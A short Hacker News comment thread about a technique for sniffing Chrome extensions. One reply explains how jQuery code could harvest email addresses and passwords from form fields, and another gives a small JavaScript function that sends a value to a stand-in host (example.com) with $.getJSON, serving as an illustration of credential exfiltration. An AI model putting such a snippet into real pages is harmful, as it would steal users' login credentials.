why would the attacker setting the password field be a problem | Hacker News

Hacker Newsnew | past | comments | ask | show | jobs | submit

		JohnQPasserby on March 17, 2012 \| parent \| context \| favorite \| on: Web pages can sniff to see what Chrome extensions ... why would the attacker setting the password field be a problem

nitrogen on March 17, 2012 | [–]

That looks like it retrieves the value of any element with the class name of .email and any password input (i.e. harvesting e-mail addresses and passwords).

http://api.jquery.com/val/#val2

jQueryIsAwesome on March 17, 2012 | [–]

    function send_to_database(val){
        $.getJSON('http://example.com/data.json',{data: val},function(){})
        return val
    }

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact